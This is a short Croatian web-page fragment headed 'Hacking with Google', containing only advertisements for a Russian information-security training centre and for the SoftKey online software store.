  • "Hakiranje s Googleom"
  • Centar za obuku "Informzashchita" http://www.itsecurity.ru - vodeći specijalizirani centar u području obuke sigurnost informacija(Licenca Moskovskog odbora za obrazovanje br. 015470, državna akreditacija br. 004251). Jedini ovlašteni centar za obuku za Internet Security Systems i Clearswift u Rusiji i zemljama ZND-a. Microsoftov ovlašteni centar za obuku (Sigurnosna specijalizacija). Programi obuke su usklađeni s Državnom tehničkom komisijom Rusije, FSB (FAPSI). Potvrde o obuci i državne isprave o usavršavanju.

    SoftKey je jedinstvena usluga za kupce, programere, trgovce i pridružene partnere. Osim toga, ovo je jedna od najboljih internetskih trgovina softverom u Rusiji, Ukrajini, Kazahstanu, koja kupcima nudi široku paletu proizvoda, mnogo načina plaćanja, brzu (često trenutnu) obradu narudžbi, praćenje procesa narudžbe u osobnom odjeljku, razne popusti iz trgovine i proizvođača BY.